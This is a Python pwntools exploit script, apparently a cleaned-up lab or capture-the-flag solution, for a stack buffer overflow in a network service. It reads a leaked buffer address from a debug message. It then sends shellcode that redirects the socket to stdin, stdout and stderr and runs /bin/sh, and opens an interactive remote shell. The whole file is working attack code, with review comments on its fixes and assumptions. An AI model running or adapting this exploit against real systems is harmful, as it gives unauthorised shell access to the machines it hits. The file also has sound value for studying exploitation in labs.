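import sys

from pwn import *

context(arch='amd64', os='linux')

# Offset from the start of the vulnerable buffer to the saved return address
# (the original hard-coded a 280-byte pad before the address).
RET_OFFSET = 280

# The shellcode dup2()s this fd over stdin/stdout/stderr.  The original
# hard-codes 5; that is an assumption about how many fds the target has open
# when it accepts the connection.  TODO(review): confirm against the target.
SOCKET_FD = 5

# Shellcode: point fds 0/1/2 at the client socket, then exec /bin/sh.
sc = shellcraft.syscall('SYS_dup2', SOCKET_FD, 0)
sc += shellcraft.syscall('SYS_dup2', SOCKET_FD, 1)
sc += shellcraft.syscall('SYS_dup2', SOCKET_FD, 2)
sc += shellcraft.sh()
sc = asm(sc)

# The shellcode lives at the front of the buffer and the return address is
# written at RET_OFFSET, so the shellcode must fit in front of it.  The original
# did not check this: a negative multiplier yields an empty pad and the return
# address silently lands at the wrong offset.
if len(sc) > RET_OFFSET:
    raise ValueError(
        f"shellcode is {len(sc)} bytes, larger than the {RET_OFFSET}-byte offset"
    )

# Target selection.  The original left every remote() call commented out, so
# `io` was never bound and the first io.sendline() raised NameError.  Take the
# target from argv instead, defaulting to the loopback address it listed.
# Other targets the original mentioned:
#   9000:9aab:1f66:e9a7:216:3eff:fec9:efb6  (IPv6 literal)
#   u.incus                                 (hostname)
HOST = sys.argv[1] if len(sys.argv) > 1 else "::1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
io = remote(HOST, PORT)

# First request; the service answers with a debug line leaking the buffer
# address, which defeats stack ASLR for the return address below.
io.sendline(b"abc")
io.recvuntil(b"DEBUG: buf is at ")
# int(..., 16) accepts both "0x7ffd..." and "7ffd...".
buf_addr = int(io.recvline().decode().strip(), 16)
log.info(f"buf is at {buf_addr:#x}")

# Payload: [shellcode][pad to RET_OFFSET][saved return address -> buffer start].
# Returning into the buffer only works if the stack is executable (no NX) --
# the original relies on that; verify with checksec before blaming the offset.
# NOTE(review): sendline() appends '\n'; if the target reads with a line-based
# call, a 0x0a byte inside the shellcode or address would truncate the payload.
payload = sc + b'A' * (RET_OFFSET - len(sc)) + p64(buf_addr)
io.sendline(payload)
io.interactive()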